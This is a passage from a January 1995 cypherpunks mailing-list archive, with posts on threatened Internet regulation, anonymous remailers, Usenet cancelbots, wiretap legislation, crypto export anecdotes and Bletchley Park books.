circumstances? Spammers would love such a state of affairs. (and remember who wrote that whine) I'm for keeping regulation out of the Inet whenever and wherever possible. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwnfPxvikii9febJAQF/QwQAuwj1FBH/Dcx0eG6gES6DB0cxYroSHkCe L1QP67dyjtyQ+DGIV/+JLUJuAuszmNenzv2dqUL//Nmp5dpLqVSTm2n4D6cGrs3/ YlU0J1TixBnoPMkOKFs18czBQRw/ezSH9tnCKQ0PFf+f1Se/tvS3htOxohkKPpGe 7g85dDm4wow= =slH/ -----END PGP SIGNATURE----- From jcorgan at scruznet.com Tue Jan 3 18:48:58 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Tue, 3 Jan 95 18:48:58 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >No reason to risk a hassle by exporting PGP from the US on your >laptop, it's everywhere. Just take your Secret Keyring file and >download PGP from a foreign FTP site once you are out of the US. Or you can do what someone mentioned to me he does when he travels abroad: He keeps PGP and his keyrings on a floppy, but then _deletes_ PGP.EXE. Of course, being a good PC user, he _always_ carries a copy of Norton Undelete with him :) Quite creative, IMHO, and technically legal. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov WWW: (for now) ftp://ftp.netcom.com/pub/jc/jcorgan/www/homepage.htm -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwoKl01Diok8GKihAQH00gP/VLWJaDaS7DNp+bv1BLszEQpOlNFyS22Y BL+Wv8Rs5efF2SG5t3E+6aHwSvaRigtjE1wwF3f46QY23ZnO1x+DTuEXy9gBRu+s usNniiyfcozfT90wPU79b/qhRrnM/Uzwxn8XddWNz0ONEk/QZqXLLx/4PdczwDaN L5XclEMG8n4= =Kzyl -----END PGP SIGNATURE----- From dave at esi.COM.AU Tue Jan 3 19:02:58 1995 From: dave at esi.COM.AU (Dave Horsfall) Date: Tue, 3 Jan 95 19:02:58 PST Subject: Why I have a 512 bit PGP key In-Reply-To: <9501031809.AA21532@elysion.iaks.ira.uka.de> Message-ID: On Tue, 3 Jan 1995, Hadmut Danisch wrote: [ On smart compilers ] > It's enough to recognize DES tables or PGP procedures. And common benchmarks, such as Eratosthenes' Sieve... -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From unicorn at access.digex.net Tue Jan 3 19:04:02 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 3 Jan 95 19:04:02 PST Subject: Calls for Reg. [Cypherpunks=Quick&Smart] In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Nesta Stubbs wrote: > Date: Tue, 3 Jan 1995 16:34:22 +0000 > From: Nesta Stubbs > To: Cypherpunks > Subject: calls for regulation > > > This is pretty scary, I mean it always sat in the back of my mind > that they would attemt to rgulate the net, and to pass legislation and > all, but now that it is rearing it's head and looks like there is going > to be a push for it, I am actually concerned, to teh point of fear > almost. Let me blow all your horns. Kudos to the exposure. Just goes to support my theory that cypherpunks tend to be way ahead of the rest of the world in predicting political moves. I have little doubt this one will come to a head as well. > > i want to know everything http://www.mcs.com/~nesta/home.html > i want to be everywhere Nesta's Home Page > i want to fuck everyone in the world & > i want to do something that matters /-/ a s t e zine > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From quester at eskimo.com Tue Jan 3 19:06:00 1995 From: quester at eskimo.com (Charles Bell) Date: Tue, 3 Jan 95 19:06:00 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: I don't know about the rest of these suggestions, but I am reasonably sure that using a fake social security number is a violation of federal law -- no matter what the user's motivation may have been. From sghahn at math1.kaist.ac.kr Tue Jan 3 19:15:44 1995 From: sghahn at math1.kaist.ac.kr (han@joe.math.uga.edu) Date: Tue, 3 Jan 95 19:15:44 PST Subject: 16 years old hacker arrested ? Message-ID: <9501040310.AA04088@math1.kaist.ac.kr> According to AFP(London), The Independent reported on January 3, 1995 that a sixteen years old boy was arrested for breaking into the computer network of US Defense Department. The report also tells that the hacker posted documents about last year's nuclear crisis between North Korea and USA. Does anyone know where can I get a copy of that documents ? From unicorn at access.digex.net Tue Jan 3 19:16:57 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Tue, 3 Jan 95 19:16:57 PST Subject: H.R.4922 In-Reply-To: <01HLF9W9HYG2938CN8@delphi.com> Message-ID: On Tue, 3 Jan 1995 VAMAGUS at delphi.com wrote: > Date: Tue, 03 Jan 1995 21:16:31 -0500 (EST) > From: VAMAGUS at delphi.com > To: cypherpunks at toad.com > Subject: H.R.4922 > > -----BEGIN PGP SIGNED MESSAGE----- > > If I am digging up old info please excuse me, I haven't been able > to read the majority of mail due to the volume of, fluff, shall > we say. > > For U.S. cypherpunks this is it: > H.R. 4922 "Interception of Digital and Other Communications" > passed as of October. This is the first *I* heard about it. > In short the bill requires: > " ...telecommunications carrier shall insure that it's equipment, > facilities, or services are capable of (1) expeditiosly isolating and > enabling the government, persuant to a court order or other > authorization, to intercept, to the exclusion of all other communications, > all wire and electronic communications carried by the carrier....etc. > > Time for me to generate more keys! I assume you are concerned that this requires carriers to provide plaintext even if the end users are encrypting. It really does not. If you are simply concerned about mandated interception ability plain or cypher, it's mildly old news. > > More info available at: > ftp.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill > gopher.eff.org /1/EFF/Policy/Digital_Telephony/digtel94.bill > http.eff.org /pub/EFF/Policy/Digital_Telephony/digtel94.bill > > ***************************Frenchie Sends******************************* > * PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. * > * As soon as any man says of the affairs of the state * > * "What does it matter to me?" the state may be given up for lost. * > * J.J.Rousseau - The Social Contract * > * PGP info: email to mail-server at rtfm.mit.edu with first line: * > * send pub/usenet/alt.security.pgp/* * > *****************************J. Francois******************************** > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5 > DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM > Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+ > s/kMO5VMkQY= > =r8C+ > -----END PGP SIGNATURE----- > > > > 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From grendel at netaxs.com Tue Jan 3 19:25:24 1995 From: grendel at netaxs.com (Michael Handler) Date: Tue, 3 Jan 95 19:25:24 PST Subject: San Francisco Editorial In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com> Message-ID: On Tue, 3 Jan 1995, Hal wrote: > Another point re Cantor and Siegel is that there is now a service > calling itself CancelMoose which goes through Julf's anon server in > Finland (anon.penet.fi) to cancel spams. This is a common misconception. Cancelmoose[tm] doesn't use anon.penet.fi for cancelling spams -- she telnets directly into the NNTP server of a university in Norway. Strangely enough, this is the same university where Arnt Gulbrantsen works. Arnt, if you don't already know, is the Norwegian hacker who wrote the cancelbots that are being used against spams (Canter & Siegel's included). Cancelmoose[tm] is reachable through anon.penet.fi for comments, and she always lists the form of the address (non-double-blinded) > The scary thing about cancels is that some proposals have actually been > directed at anonymous posts themselves. Someone anonymously posted > what purported to be a grisly transcript of the last seconds of the > doomed Challenger crew as they fell to the ocean. This caused a great > hue and cry and some calls for banning anonymous posts and/or > retroactively cancelling them. This led to some very amusing events > which Detweiler has chronicled in his FAQ on anonymity, the net result > of which was that the idea was discredited. But the emergence of > CancelMoose is not an altogether positive event in my view. Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies. He was promptly beaten down by the net. Feh. -mbh- ObCrypto: I've been working on a draft paper that puts forward a proposal to make Usenet articles uncancellable except by [1] the original author of the article or [2] the system admin who runs the NNTP server the article issued from. The problem with this is that it eliminates Cancelmoose[tm] and the other spam cancellers, who, IMHO, are Good Things. -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator PGP Key ID FC031321 Print: 9B DB 9A B0 1B 0D 56 DA 61 6A 57 AD B2 4C 7B AF "They like to watch everything you do / Transmitters hidden in the wall"--JD From rishab at dxm.ernet.in Tue Jan 3 19:28:47 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Tue, 3 Jan 95 19:28:47 PST Subject: NYT article and LaMacchia case Message-ID: Anon wrote: > I want to publicly thank John Young for making articles available. MOst of > those articles I would not otherwise have seen. I second that! > that John offered. Was there anyone in the world, well, in the cyberworld, who > was fooled by the article on the Microsoft acquisition of the Catholic church? > Anyone, who after reading that piece, considered anything other than the > creativity of the author, should be committed to St. John's Home for the > Desperately Dumb. Notice that Microsoft was flooded with complaints only after Rush Limbaugh read it on his show... > However, there was something in that article that was of concern. If the > Massachusetts judge in the MIT student case actually said that he couldn't act > because Congress had not enacted any laws, then it is for sure they will try to > and they will try to act hurriedly. Hurried actions by congress are even worse The Reuters report said: Although U.S. District Court Judge Richard Stearns was critical of LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud statute because it could result in a flood of actions against home computer users copying even single software programmes for their own use. Anonymity had nothing to do with it. It was clear cut copyright law - which wouldn't have hurt LaMacchia as he wasn't making anything out of it, so they tried to hit him with wire fraud, and the Judge found _that_ untenable. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From entropy at IntNet.net Tue Jan 3 19:30:34 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 3 Jan 95 19:30:34 PST Subject: Siegel and Lewis In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com> Message-ID: > Martha Siegel is just fucked up enough that she will probably push > for legislation regulating the nets. Congress is just fucked up that > they might pass it. And if they do I will make it a definate point to do all I can to emigrate to the UK, the Netherlands, or somewhere else. This country is increasingly becoming a police state, and I've got too many years of life left to just passively deal with it. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Tue Jan 3 19:32:00 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Tue, 3 Jan 95 19:32:00 PST Subject: Anonymous payment scheme In-Reply-To: <9501040140.AB27685@eri.erinet.com> Message-ID: > I've heard of that, but I thought it was only a redundancy check to check > for read errors in the swiping process. That's why they use checksums - I have some information about the VISA-net authorization network (which came from Phrack) and also some about the actual encoding of the card, if anyone cares. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jcorgan at scruznet.com Tue Jan 3 19:36:39 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Tue, 3 Jan 95 19:36:39 PST Subject: Edupage 1/3/95 Message-ID: Some selected articles from Educom that may interest you... *************************************************************************** Edupage, a summary of news items on information technology, is provided three times each week as a service by Educom -- a Washington, D.C.-based consortium of leading colleges and universities seeking to transform education through the use of information technology. *************************************************************************** CYBERPHOBICS GALORE A recent Gallup poll conducted for MCI shows almost half of the 600 white collar respondents admitting they are cyberphobic or resistant to new technology. More than a third do not use a computer at all, either at home or at work, and nearly 60% don't use voice mail. Two thirds do not use e-mail at work, and about the same number don't carry a pager. The most common reason cited for anti-technology attitudes was a fear of loss of privacy. Close runners up were worries over information overload and a fear of losing face-to-face contact with associates. (Miami Herald 1/2/95 p.22) MORE INTERNET FACTS Traffic on the NSFnet grew a whopping 110% in 1994, and the number of countries online increased from approximately 137 in 1993 to approximately 159 this past year. There were 1,964 phone calls to InterNIC Registration Services during November '94. For more facts, check out http://www.openmarket.com/info/internet-index/current-sources.html. (The Internet Index, Number 5) "GIVE US YOUR MONEY, BUT KEEP YOUR OPINIONS TO YOURSELF!" A survey of small business executives conducted for IBM by Roper Starch Worldwide shows 65% of the respondents saying that building the information highway is a good use of government funds, but only 3% think the government should have "a lot" of influence on how the highway operates. Forty-four percent felt the government should have no influence, and 49% said they thought it should have "some" say in how things were run. (Inc. Technology Premiere Issue p.19) THE WIRED REVOLUTION While saluting Wired magazine's worthy premise as a publication that addresses the social and cultural effects of digital technologies, the director of the 21st Century Project at the University of Texas blasts Wired for its "fevered, adolescent consumerism, its proud display of empty thoughts from a parade of smoke-shoveling celebrity pundits, its smug disengagement from the thorny problems facing postindustrial societies, and most annoyingly, its over-the-top narcissism. If this is the revolution, do we really want to be part of it?" (New Republic 1/9-16/95 p.19) ************************************************************************ EDUPAGE is what you've just finished reading. To subscribe to Edupage: send a message to: listproc at educom.edu and in the BODY of the message type: subscribe edupage Sidney Carlton (assuming that your name is Sidney Carlton; if it isn't, substitute your own name) ... To cancel subscription to Edupage: send a message to: listproc at educom.edu and in the BODY of the message type: unsubscribe edupage. ************************************************************************ Educom -- Transforming Education Through Information Technology ************************************************************************ Written by John Gehl & Suzanne Douglas. V: 404-371-1853. F: 404-371-8057 == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov From nesta at nesta.pr.mcs.net Tue Jan 3 20:31:47 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Tue, 3 Jan 95 20:31:47 PST Subject: EVEN MORE creis for regulation Message-ID: Yet ANOTHER call for net regulation. There are so many now I am hard pressedto keep track of them. It appears that the media may adopt "regulation of the Internet" as it's next babe. Ya know how the adopted the Internet itself first, now watch as the entire mainstream media is flooded with calls for net regulation. Bigots' Growing Use Of Computer Networks Assailed The Simon Wiesenthal Center on 12-13-94 sent a letter to Prodigy protesting bigots online messages of hate. Rabbi Abraham Cooper of the center decries the growing use by hate groups. The Wiesenthal Center wants government policing of the internet. They fear one-sided exposure of youths to white supremacist messages. Civil libertarians and white supremacists say that free speech should prevail. Marc Rotenburg of the Electronic Privacy Info Center says that it's a difficult issue and that censorship and control are ver y inappropriate. White supremacist groups like the National Alliance and the American Rennaisance can spread propaganda nationwide. These types of hate groups are kept out of mainstream media and are thus short of funds. Valerie Filds of West LA said she saw an anti latino diatribe on Prodigy that plugged American Rennaisance of Louisville KY. She says she saw a message that seemed to be from a white supremacist group. She says she saw one referring to the "Diary of Anne Frank" as a "Jewish Hoax". The Wiesenthal cente r wants such messages deleted. Anti-semitic comments on Prodigy in 1991 resulted in a policy prohibiting "blatant expressions of hatred". Kevin Strom, who produces a radio show for National Alliance, said he was recently blocked from forums on Compuserve. He said that "the system operator decided we didn't deserve free speech." His article "The Wisdom of Henry Ford" about the book "The International Jew" was downloaded 120 times. Georgia Griffith of Compuserve said "we are not oblidged to publish it for him." There are 5 m subscribers to commercial online services, 2 m to Prodigy, 20 m accessing the internet. Rabbi Cooper wants the FCC to place a cop on the internet. White supremacist propaganda is available on the internet. The Institute for Historical Review's article "Frequently Asked Questions about National Socialis m" is available. Far-right activists say anonymity removes inhibitions too. The National Alliance uses Netcom Online Communications Services in California. Texts and promotions of its radio show are available there. National Alliance chairman William Pierce said "The major media in this country are very biased against our political point of view. They present us with ridicule or in a very distorted way. The information superhighway is much more free of censorship." From dave at esi.COM.AU Tue Jan 3 21:06:46 1995 From: dave at esi.COM.AU (Dave Horsfall) Date: Tue, 3 Jan 95 21:06:46 PST Subject: San Francisco Editorial In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Michael Handler wrote: > Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to > cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies. > He was promptly beaten down by the net. Feh. He was also the one who presented a convincing argument that the one who posted the alleged transcript was none other than Julf himself; he (Dick) was getting responses from the perpetrator faster than the delayed-response mechanism would have allowed... -- Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6 Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD From wcs at anchor.ho.att.com Tue Jan 3 21:26:57 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 21:26:57 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park Message-ID: <9501040525.AA10625@anchor.ho.att.com> Another book with some insight into Bletchley Park is "Cloak and Gown" (I forget the author), about the relationship between Yale academics and the OSS, the WW2 predecessor to the CIA. Among the various Yalies who went into the OSS was James Jesus Angleton, who spent a lot of time at Bletchley analyzing information that might be useful for US Army and covert OSS activities, and trying to support counterintelligene work by correlating the information from intercepts of German understanding of US and British plans with the Allied sources and users of those plans, to try to find leaks, traitors, moles, spies, and other types that counter-spook spooks worry about. Besides the Enigma interceptions themselves, the big secret the OSS and British intelligence were paranoid about protecting was that all the known German spies in Great Britain had been caught and turned for disinformation use (or killed); almost everything Germany was getting from its spies was bogus. Bill From pcw at access.digex.net Tue Jan 3 22:02:05 1995 From: pcw at access.digex.net (Peter Wayner) Date: Tue, 3 Jan 95 22:02:05 PST Subject: SAN FRANCISCO EDITORIAL Message-ID: <199501040602.AA11010@access2.digex.net> The scandalous Finland anonymous remailer is also used for good. The Samaritans, an organization in England devoted to helping folks who are thinking of suicide, often receives notes filtered through it. If someone sends me the right address, I'll send a letter to the Comical explaining this politely. We should stress the strength of anonymity. From tcmay at netcom.com Tue Jan 3 22:13:21 1995 From: tcmay at netcom.com (Timothy C. May) Date: Tue, 3 Jan 95 22:13:21 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park In-Reply-To: <9501040525.AA10625@anchor.ho.att.com> Message-ID: <199501040551.VAA12193@netcom13.netcom.com> bill.stewart at pleasantonca.ncr.com +1-510-484-6204 wrote: > > Another book with some insight into Bletchley Park is > "Cloak and Gown" (I forget the author), about the relationship between > Yale academics and the OSS, the WW2 predecessor to the CIA. That's by Robin Winks. I have a copy, in hardback, that I found some years back in a used book store. Lots of good stuff about the central role Yale has played. > Among the various Yalies who went into the OSS was James Jesus Angleton, > who spent a lot of time at Bletchley analyzing information that might > be useful for US Army and covert OSS activities, and trying to support ... A friend of mine, Buddy Diamond, developer of the "NFL Challenge" PC game of some years back, worked with James J. Angleton on a kind of "CIA Challenge" training game. I met Buddy at the 1988 Crypto conference, and he was the main reason I got invited to the Hackers Conference that year (and thereafter, as is the norm). Oh, he went to Yale, and this had a lot to do with the CIA getting in touch with him. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rmtodd at servalan.servalan.com Tue Jan 3 22:37:33 1995 From: rmtodd at servalan.servalan.com (Richard Todd) Date: Tue, 3 Jan 95 22:37:33 PST Subject: San Francisco Editorial In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com> Message-ID: In cypherpunks Hal Finney writes: >Another point re Cantor and Siegel is that there is now a service >calling itself CancelMoose which goes through Julf's anon server in >Finland (anon.penet.fi) to cancel spams. (Spams are off-topic, Um, not exactly. CancelMoose has a mailing address on the anon.penet.fi server, for the benefit of those who wish to contact him, but the cancels are injected elsewhere. I don't believe anon.penet.fi lets you send control messages (of which cancels are a subject) thru it. From wcs at anchor.ho.att.com Tue Jan 3 22:53:32 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:32 PST Subject: Anonymous payment scheme Message-ID: <9501040637.AA11348@anchor.ho.att.com> > HH> So, you may be able to have a form of anonymity from the person you ar > HH> transacting with, but I don't think you can be anonymous from the bank > HH> and from the government. And personally, I am more concerned about th > With a debit card you can't be anonymous, because your money resides in > the bank. With digital cash, and the ability to transfer money to > another digital cash card via phone lines, I don't see how they can > successfully trace everything. They will try, no doubt. I thought the origination of this thread was a hypothetical proposal to start a Cypherpunks Bank which would join Visa and issue debit cards; they could be started for cash, under pseudonyms, and would expire when they ran dry. So you and your 10,000 closest friends could call yourselves anything you want, and the merchant would know that Johnny Cash Foobar buys a lot of pharmaceutical manufacturing equipment, but doesn't know who he is. The bank's not paying interest, so they probably don't need SSNs until the next round of privacy-prevention laws, and they're not using them as credit-validation tools since they're only issuing debit cards to cash customers anyway. Meanwhile, it gets to hire lots of lawyers, pay Visa commissions, and collect interest on the float. And if you get tired of being Johnny Cash Foobar, or don't like having your purchases correlated, John Hancock's card can buy the motorboats and Joe Toshiba's can pay for the precision machine tools... The standard merchant contract with Visa/Mastercharge used to forbid merchants from asking for additional ID unless they suspected fraud; I think some states have made laws about this as well. Bill From wcs at anchor.ho.att.com Tue Jan 3 22:53:36 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:36 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <9501040641.AA11386@anchor.ho.att.com> James Donald writes: > On Mon, 2 Jan 1995, Carol Anne Braddock wrote: > > Right now, I don't think U.S. Customs is going to ask you if you > > have PGP in your PC if you leave the country, or return either. > > > > They should, and I'd be proud to say yes. > > Well Carol, I am sure your heart is in the right place, but I > do not agree. > > They should not, and I'd be deranged to say yes. Of course you'd be deranged to say yes, but just imagine what would happen if every Customs Thug were required to ask everyone carrying a PC into our out of the country if they had any software on it capable of protecting the privacy of their files or communications, and requiring major paperwork of anyone who said yes.... the law would be gone in a week. My latest beef with the customs thugs was when I last came back from Mexico, I noticed that their arm badges said something about like "U.S. Customs Service - Protectors of Independence" Arrrgh! Bill From wcs at anchor.ho.att.com Tue Jan 3 22:53:38 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 3 Jan 95 22:53:38 PST Subject: Art and Crypto - Re: I'm back. :) Message-ID: <9501040652.AA11466@anchor.ho.att.com> Lile Elam writes > I finally got back on cypherpunks. Have been incredibly busy > but wanted to keep intouch as several artist friends of mine > want to start using art as a encryption vehicle... Should be fun... It works on so many levels, as well - hiding encrypted bits in the low-order bits of pixel color values - representing data in the colored spots on a Seurat impressionist work or the lines and splotches on a Jackson Pollack imitation - wondering what the artist _really meant_ by a given figure :-) It also may be a good way to nag us into doing stealthy versions of PGP and other cryptosystem headers - steganography is less useful when the encrypted message always starts off with - ----- BEGIN PGP ENCRYPTED FILE and has the recipient's keyid readily findable as well. Bill From gnu Wed Jan 4 02:37:13 1995 From: gnu (gnu) Date: Wed, 4 Jan 95 02:37:13 PST Subject: Cloak and Gown In-Reply-To: <9501040525.AA10625@anchor.ho.att.com> Message-ID: <9501041037.AA11018@toad.com> > Another book with some insight into Bletchley Park is > "Cloak and Gown" (I forget the author), "Use the source, Luke!" % telnet locis.loc.gov L O C I S : LIBRARY OF CONGRESS INFORMATION SYSTEM To make a choice: type a number, then press ENTER 1 Library of Congress Catalog 4 Braille and Audio 2 Federal Legislation 5 Organizations 3 Copyright Information 6 Foreign Law ... b cloak and gown To choose from list, see examples at bottom. FILE: LOCI Terms alphabetically close to:CLOAK AND GOWN B01 Cloak & gown//(TITL=3) B02 Cloak and dagger//(TITL=3) B03 Cloak and dagger fiction//(TITL=2) B04 Cloak and Dagger in Predator and Prey//(TITL=1) B05 Cloak and gavel//(TITL=1) B06+Cloak and gown//(TITL=3) B07 Cloak for the dreamer//(TITL=1) B08 Cloak of Aesir//(TITL=1) B09 Cloak of competence//(TITL=1) B10 Cloak of consciousness//(TITL=1) B11 Cloak of darkness//(TITL=2) B12 Cloak of friendship//(TITL=1) ---EXAMPLES: s b6 (SELECTs line b6; creates a SET for each term type) f b6-b8/b10 (FINDs b6-b8 and b10; combines sets, displays result) r b6 (RETRIEVEs term on b6; searches text in some files) r subj=b6 (RETRIEVEs term type specified; e.g., SUBJ, TITL) f b1/b6 ITEMS 1-3 OF 3 SET 3: BRIEF DISPLAY FILE: LOCI (DESCENDING ORDER) 1. 88-672288: Winks, Robin W. Cloak and gown : scholars in America's secret war / London : Collins Harvill, 1987. 607 p. ; 24 cm. NOT IN LC COLLECTION 2. 88-30560: Winks, Robin W. Cloak & gown : scholars in the secret war, 1939-1961 / New York : Quill, 1988. p. cm. CIP - NOT YET IN LC 3. 87-7683: Winks, Robin W. Cloak & gown : scholars in the secret war, 1939-1961 / 1st ed. New York : Morrow, c1987. 607 p., [16] p. of plates : ill., ports. ; 25 cm. LC CALL NUMBER: JK468.I6 W48 1987 From dmandl at bear.com Wed Jan 4 06:03:44 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 4 Jan 95 06:03:44 PST Subject: Press attack on anonymity. Message-ID: <9501041402.AA07682@yeti.bsnet> > From: > > Sandy Sandfort posted an editorial from the Mondays SF Chronicle. > > There is a front page story in todays San Jose Mercury News on why > anonymity is a bad thing. > > Its from a New York Times story by Peter H. Lewis > > The question is who launched all this stuff? Funny thing is, _I_ just wrote a long piece on anon remailers too, though it was obviously from a different perspective from Peter Lewis's (and a lot better written, natch). The local paper it was written for liked it, but thought the subject matter was "too technical" for its readership, so I'm hoping to get it published elsewhere. When I got the idea, all I could think of was why no one else had done a piece specifically on remailers. It's an important story. I guess everyone else was working on them at the same time. I hope that there are some good pro-anonymity pieces published soon to give some "balance." P.S.: Martha S. Siegel is absolutely out of her mind. If she wasn't lynched after the green card episode, this latest stunt should do it. --Dave. From nesta at nesta.pr.mcs.net Wed Jan 4 06:09:12 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Wed, 4 Jan 95 06:09:12 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: On Tue, 3 Jan 1995, Jonathan Cooper wrote: > > Martha Siegel is just fucked up enough that she will probably push > > for legislation regulating the nets. Congress is just fucked up that > > they might pass it. > > And if they do I will make it a definate point to do all I can to > emigrate to the UK, the Netherlands, or somewhere else. > > This country is increasingly becoming a police state, and I've got too > many years of life left to just passively deal with it. uhm Jon, it seems that emigrating would be passively dealing with it, kinda contradicting your statement that you re too young to just passively deal with it. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From dmandl at bear.com Wed Jan 4 06:18:02 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 4 Jan 95 06:18:02 PST Subject: Siegel and Lewis Message-ID: <9501041417.AA08643@yeti.bsnet> > From: > > I just got off the phone with Peter Lewis, reporter for the New > York Times. He is unaware of any grand consipracy to regulate the Net, > but then again if there was one, I don't think they'd tell him. > > His piece that ran Saturday was badly mangled by the editorial > process, especially since it ran on page one. Those articles get to be > mangled by a whole new set of people who otherwise wouldn't get to > touch it. I think Lewis has basically good intentions, and does do his > homework before writing a story. I have a good friend who writes for the Times. Last time I spoke to him, he was frantically trying to get in touch with the Business editor because a piece he'd just written had been hacked to bits, with several inaccuracies introduced. He probably couldn't reach the guy, and I bet the mutilated version got printed (I don't know for sure, since I don't read the Times). This is standard. It's almost a rule that whenever there's a story on a subject you're familiar with there'll be major inaccuracies. So what does that say about all the others? > Yecchh. Now I know why I don't rely on daily newspapers for my news Well, that's one reason, anyway... --Dave. From db at Tadpole.COM Wed Jan 4 06:26:22 1995 From: db at Tadpole.COM (Doug Barnes) Date: Wed, 4 Jan 95 06:26:22 PST Subject: Siegel and Lewis In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com> Message-ID: <9501041424.AA25564@tadpole.tadpole.com> Why is it that so many cypherpunks like the economist? I learned recently that Eric is a big fan. So am I. You're certainly not the first other cypherpunk to mention this. Weird. I mean, it's not exactly a radical publication... it just gets its *&#$*#$ facts right. Probably this is it. Doug From perry at imsi.com Wed Jan 4 06:39:58 1995 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 4 Jan 95 06:39:58 PST Subject: Siegel and Lewis In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com> Message-ID: <9501041431.AA14688@snark.imsi.com> Raph Levien says: > I just got off the phone with Peter Lewis, reporter for the New > York Times. He is unaware of any grand consipracy to regulate the Net, > but then again if there was one, I don't think they'd tell him. I doubt that there is one. > Martha Siegel is just fucked up enough that she will probably push > for legislation regulating the nets. Congress is just fucked up that > they might pass it. Peter should take some responsibility for perpetuating Mr. Canter and Ms. Siegel. He failed, in my opinion, to properly reflect the situation in his articles about it in The Times. In particular, he did very little to convey that the two are de fact disbarred attorneys who had played the same games in "real space" that they had in Cyberspace and had been dragged through the coals by the Florida bar association for it because to almost anyone what they had been doing was a gross ethical violation. He also made it seem as though internet users were opposed to advertising, when, of course, advertising has been on the net for many many years, and newsgroups like comp.newprod exist to publish nothing but ads. He didn't properly convey that the defect in their behavior had been the jamming of 